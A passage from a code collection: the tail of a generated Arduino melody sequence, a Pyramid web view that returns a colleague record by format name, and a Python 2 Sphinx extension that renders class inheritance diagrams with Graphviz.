tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 246, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 369, 78.12496875);
delay(86.8055208333);
tone(tonePin, 155, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 77, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 155, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 65, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 369, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 92, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 123, 78.12496875);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 116, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
fout.close()
|
py | b41540b5d4282a93e8a997b431dbae3201b09eb4 | from pyramid.httpexceptions import HTTPBadRequest, HTTPForbidden, HTTPOk, HTTPNotFound
from pyramid.response import Response
from pyramid.view import view_config
from .models import DBSession, Colleague, Colleaguetriage
from .models_helpers import ModelsHelper
import transaction
import logging
import json
log = logging.getLogger(__name__)
models_helper = ModelsHelper()
# @view_config(route_name='colleague_create', renderer='json', request_method='POST')
# def colleague_triage_new_colleague(request):
# colleague_data = {}
# for p in request.params:
# colleague_data[p] = request.params[p]
# ct = Colleaguetriage(triage_type='New', json=json.dumps(colleague_data), colleague_id=None, created_by="OTTO")
# DBSession.add(ct)
# transaction.commit()
# return {'sucess': True}
# @view_config(route_name='colleague_update', renderer='json', request_method='PUT')
# def colleague_triage_update_colleague(request):
# format_name = request.matchdict['format_name']
# if format_name is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No format name provided'}))
# colleague = DBSession.query(Colleague).filter(Colleague.format_name == format_name).one_or_none()
# if colleague:
# colleague_data = {}
# for p in request.params:
# colleague_data[p] = request.params[p]
# ct = Colleaguetriage(triage_type='Update', colleague_data=json.dumps(colleague_data), colleague_id=int(colleague.colleague_id), created_by="OTTO")
# DBSession.add(ct)
# transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague not found'}))
# return {'sucess': True}
# @view_config(route_name='colleague_triage_accept', renderer='json', request_method='POST')
# def colleague_triage_accept(request):
# triage_id = request.matchdict['id']
# if triage_id is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No triage id provided'}))
# triage = DBSession.query(Colleaguetriage).filter(Colleaguetriage.curation_id == triage_id).one_or_none()
# if triage:
# triage.apply_to_colleague()
# # triage.delete()
# # transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague triage not found'}))
# return {'success': True}
# @view_config(route_name='colleague_triage_update', renderer='json', request_method='PUT')
# def colleague_triage_update(request):
# triage_id = request.matchdict['id']
# if triage_id is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No triage id provided'}))
# triage = DBSession.query(Colleaguetriage).filter(Colleaguetriage.curation_id == id).one_or_none()
# if triage:
# colleague_data = {}
# for p in request.params:
# colleague_data[p] = request.params[p]
# triage.colleague_data = json.dumps(colleague_data)
# DBSession.add(triage)
# transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague triage not found'}))
# return {'success': True}
# @view_config(route_name='colleague_triage_delete', renderer='json', request_method='DELETE')
# def colleague_triage_delete(request):
# triage_id = request.matchdict['id']
# if triage_id is None:
# return HTTPBadRequest(body=json.dumps({'error': 'No triage id provided'}))
# triage = DBSession.query(Colleaguetriage).filter(Colleaguetriage.curation_id == id).one_or_none()
# if triage:
# triage.delete()
# transaction.commit()
# else:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague triage not found'}))
@view_config(route_name='colleague_get', renderer='json', request_method='GET')
def colleague_by_format_name(request):
try:
format_name = request.matchdict['format_name']
colleague = DBSession.query(Colleague).filter(
Colleague.format_name == format_name).one_or_none()
if colleague is not None:
# if colleague.is_in_triage:
# return HTTPNotFound(body=json.dumps({'error': 'Colleague not found, pending review due to recent submission update. is in triage: '}))
result = colleague.to_simple_dict()
return result
        else:
            return {}
except Exception as e:
return HTTPNotFound(body=json.dumps({'error': str(e)}))
|
py | b41540ded1cbe81d97cecc430ff1dfab3a9d5f71 | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
"""
Defines a docutils directive for inserting inheritance diagrams.
Provide the directive with one or more classes or modules (separated
by whitespace). For modules, all of the classes in that module will
be used.
Example::
Given the following classes:
class A: pass
class B(A): pass
class C(A): pass
class D(B, C): pass
class E(B): pass
.. inheritance-diagram: D E
Produces a graph like the following:
A
/ \
B C
/ \ /
E D
The graph is inserted as a PNG+image map into HTML and a PDF in
LaTeX.
"""
import inspect
import os
import re
import subprocess
try:
from hashlib import md5
except ImportError:
from md5 import md5
from docutils.nodes import Body, Element
from docutils.parsers.rst import directives
from sphinx.roles import xfileref_role
def my_import(name):
"""Module importer - taken from the python documentation.
This function allows importing names with dots in them."""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
class DotException(Exception):
pass
class InheritanceGraph(object):
"""
Given a list of classes, determines the set of classes that
they inherit from all the way to the root "object", and then
is able to generate a graphviz dot graph from them.
"""
def __init__(self, class_names, show_builtins=False):
"""
*class_names* is a list of child classes to show bases from.
If *show_builtins* is True, then Python builtins will be shown
in the graph.
"""
self.class_names = class_names
self.classes = self._import_classes(class_names)
self.all_classes = self._all_classes(self.classes)
if len(self.all_classes) == 0:
raise ValueError("No classes found for inheritance diagram")
self.show_builtins = show_builtins
py_sig_re = re.compile(r'''^([\w.]*\.)? # class names
(\w+) \s* $ # optionally arguments
''', re.VERBOSE)
def _import_class_or_module(self, name):
"""
Import a class using its fully-qualified *name*.
"""
try:
path, base = self.py_sig_re.match(name).groups()
except:
raise ValueError(
"Invalid class or module '%s' specified for inheritance diagram" % name)
fullname = (path or '') + base
path = (path and path.rstrip('.'))
if not path:
path = base
try:
module = __import__(path, None, None, [])
# We must do an import of the fully qualified name. Otherwise if a
# subpackage 'a.b' is requested where 'import a' does NOT provide
# 'a.b' automatically, then 'a.b' will not be found below. This
# second call will force the equivalent of 'import a.b' to happen
# after the top-level import above.
my_import(fullname)
except ImportError:
raise ValueError(
"Could not import class or module '%s' specified for inheritance diagram" % name)
try:
todoc = module
for comp in fullname.split('.')[1:]:
todoc = getattr(todoc, comp)
except AttributeError:
raise ValueError(
"Could not find class or module '%s' specified for inheritance diagram" % name)
# If a class, just return it
if inspect.isclass(todoc):
return [todoc]
elif inspect.ismodule(todoc):
classes = []
for cls in todoc.__dict__.values():
if inspect.isclass(cls) and cls.__module__ == todoc.__name__:
classes.append(cls)
return classes
raise ValueError(
"'%s' does not resolve to a class or module" % name)
def _import_classes(self, class_names):
"""
Import a list of classes.
"""
classes = []
for name in class_names:
classes.extend(self._import_class_or_module(name))
return classes
def _all_classes(self, classes):
"""
Return a list of all classes that are ancestors of *classes*.
"""
all_classes = {}
def recurse(cls):
all_classes[cls] = None
for c in cls.__bases__:
if c not in all_classes:
recurse(c)
for cls in classes:
recurse(cls)
return all_classes.keys()
def class_name(self, cls, parts=0):
"""
Given a class object, return a fully-qualified name. This
works for things I've tested in matplotlib so far, but may not
be completely general.
"""
module = cls.__module__
if module == '__builtin__':
fullname = cls.__name__
else:
fullname = "%s.%s" % (module, cls.__name__)
if parts == 0:
return fullname
name_parts = fullname.split('.')
return '.'.join(name_parts[-parts:])
def get_all_class_names(self):
"""
Get all of the class names involved in the graph.
"""
return [self.class_name(x) for x in self.all_classes]
# These are the default options for graphviz
default_graph_options = {
"rankdir": "LR",
"size": '"8.0, 12.0"'
}
default_node_options = {
"shape": "box",
"fontsize": 10,
"height": 0.25,
"fontname": "Vera Sans, DejaVu Sans, Liberation Sans, Arial, Helvetica, sans",
"style": '"setlinewidth(0.5)"'
}
default_edge_options = {
"arrowsize": 0.5,
"style": '"setlinewidth(0.5)"'
}
def _format_node_options(self, options):
return ','.join(["%s=%s" % x for x in options.items()])
def _format_graph_options(self, options):
return ''.join(["%s=%s;\n" % x for x in options.items()])
def generate_dot(self, fd, name, parts=0, urls={},
graph_options={}, node_options={},
edge_options={}):
"""
Generate a graphviz dot graph from the classes that
were passed in to __init__.
*fd* is a Python file-like object to write to.
*name* is the name of the graph
*urls* is a dictionary mapping class names to http urls
*graph_options*, *node_options*, *edge_options* are
dictionaries containing key/value pairs to pass on as graphviz
properties.
"""
g_options = self.default_graph_options.copy()
g_options.update(graph_options)
n_options = self.default_node_options.copy()
n_options.update(node_options)
e_options = self.default_edge_options.copy()
e_options.update(edge_options)
fd.write('digraph %s {\n' % name)
fd.write(self._format_graph_options(g_options))
for cls in self.all_classes:
if not self.show_builtins and cls in __builtins__.values():
continue
name = self.class_name(cls, parts)
# Write the node
this_node_options = n_options.copy()
url = urls.get(self.class_name(cls))
if url is not None:
this_node_options['URL'] = '"%s"' % url
fd.write(' "%s" [%s];\n' %
(name, self._format_node_options(this_node_options)))
# Write the edges
for base in cls.__bases__:
if not self.show_builtins and base in __builtins__.values():
continue
base_name = self.class_name(base, parts)
fd.write(' "%s" -> "%s" [%s];\n' %
(base_name, name,
self._format_node_options(e_options)))
fd.write('}\n')
    def run_dot(self, args, name, parts=0, urls={},
                graph_options={}, node_options={}, edge_options={}):
        """
        Run graphviz 'dot' over this graph, returning whatever 'dot'
        writes to stdout.

        *args* will be passed along as commandline arguments.

        *name* is the name of the graph

        *urls* is a dictionary mapping class names to http urls

        Raises DotException for any of the many OS and
        installation-related errors that may occur.
        """
        try:
            dot = subprocess.Popen(['dot'] + list(args),
                                   stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                                   close_fds=True)
        except OSError:
            raise DotException("Could not execute 'dot'.  Are you sure you have 'graphviz' installed?")
        except ValueError:
            raise DotException("'dot' called with invalid arguments")
        except:
            raise DotException("Unexpected error calling 'dot'")

        self.generate_dot(dot.stdin, name, parts, urls, graph_options,
                          node_options, edge_options)
        dot.stdin.close()
        result = dot.stdout.read()
        returncode = dot.wait()
        if returncode != 0:
            raise DotException("'dot' returned the error code %d" % returncode)
        return result
class inheritance_diagram(Body, Element):
    """
    A docutils node to use as a placeholder for the inheritance
    diagram.
    """
    pass
def inheritance_diagram_directive(name, arguments, options, content, lineno,
                                  content_offset, block_text, state,
                                  state_machine):
    """
    Run when the inheritance_diagram directive is first encountered.
    """
    node = inheritance_diagram()

    class_names = arguments

    # Create a graph starting with the list of classes
    graph = InheritanceGraph(class_names)

    # Create xref nodes for each target of the graph's image map and
    # add them to the doc tree so that Sphinx can resolve the
    # references to real URLs later.  These nodes will eventually be
    # removed from the doctree after we're done with them.
    for name in graph.get_all_class_names():
        refnodes, x = xfileref_role(
            'class', ':class:`%s`' % name, name, 0, state)
        node.extend(refnodes)

    # Store the graph object so we can use it to generate the
    # dot file later
    node['graph'] = graph

    # Store the original content for use as a hash
    node['parts'] = options.get('parts', 0)
    node['content'] = " ".join(class_names)
    return [node]
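
# The hash of the directive's content (the class list plus the ``parts``
# option) is used to derive a stable output filename, so the same diagram
# keeps the same image name across builds and distinct diagrams never collide.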
def get_graph_hash(node):
    return md5(node['content'] + str(node['parts'])).hexdigest()[-10:]
def html_output_graph(self, node):
    """
    Output the graph for HTML.  This will insert a PNG with a
    clickable image map.
    """
    graph = node['graph']
    parts = node['parts']

    graph_hash = get_graph_hash(node)
    name = "inheritance%s" % graph_hash
    path = '_images'
    dest_path = os.path.join(setup.app.builder.outdir, path)
    if not os.path.exists(dest_path):
        os.makedirs(dest_path)
    png_path = os.path.join(dest_path, name + ".png")
    path = setup.app.builder.imgpath

    # Create a mapping from fully-qualified class names to URLs.
    urls = {}
    for child in node:
        if child.get('refuri') is not None:
            urls[child['reftitle']] = child.get('refuri')
        elif child.get('refid') is not None:
            urls[child['reftitle']] = '#' + child.get('refid')

    # These arguments to dot will save a PNG file to disk and write
    # an HTML image map to stdout.
    image_map = graph.run_dot(['-Tpng', '-o%s' % png_path, '-Tcmapx'],
                              name, parts, urls)

    return ('<img src="%s/%s.png" usemap="#%s" class="inheritance"/>%s' %
            (path, name, name, image_map))
def latex_output_graph(self, node):
    """
    Output the graph for LaTeX.  This will insert a PDF.
    """
    graph = node['graph']
    parts = node['parts']

    graph_hash = get_graph_hash(node)
    name = "inheritance%s" % graph_hash
    dest_path = os.path.abspath(os.path.join(setup.app.builder.outdir, '_images'))
    if not os.path.exists(dest_path):
        os.makedirs(dest_path)
    pdf_path = os.path.abspath(os.path.join(dest_path, name + ".pdf"))

    graph.run_dot(['-Tpdf', '-o%s' % pdf_path],
                  name, parts, graph_options={'size': '"6.0,6.0"'})
    return '\n\\includegraphics{%s}\n\n' % pdf_path
def visit_inheritance_diagram(inner_func):
    """
    This is just a wrapper around html/latex_output_graph to make it
    easier to handle errors and insert warnings.
    """
    def visitor(self, node):
        try:
            content = inner_func(self, node)
        except DotException, e:
            # Insert the exception as a warning in the document
            warning = self.document.reporter.warning(str(e), line=node.line)
            warning.parent = node
            node.children = [warning]
        else:
            source = self.document.attributes['source']
            self.body.append(content)
            node.children = []
    return visitor


def do_nothing(self, node):
    pass
def setup(app):
    setup.app = app
    setup.confdir = app.confdir

    app.add_node(
        inheritance_diagram,
        latex=(visit_inheritance_diagram(latex_output_graph), do_nothing),
        html=(visit_inheritance_diagram(html_output_graph), do_nothing))
    app.add_directive(
        'inheritance-diagram', inheritance_diagram_directive,
        False, (1, 100, 0), parts=directives.nonnegative_int)
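
# Illustrative use of the extension in a Sphinx project -- a sketch only, not
# part of the original module; the module path in ``extensions`` and the class
# names are hypothetical and depend on where this file lives in your project:
#
#   # conf.py
#   extensions = ['inheritance_diagram']
#
#   # somewhere in a .rst document
#   .. inheritance-diagram:: matplotlib.patches.Patch matplotlib.patches.Rectangle
#      :parts: 2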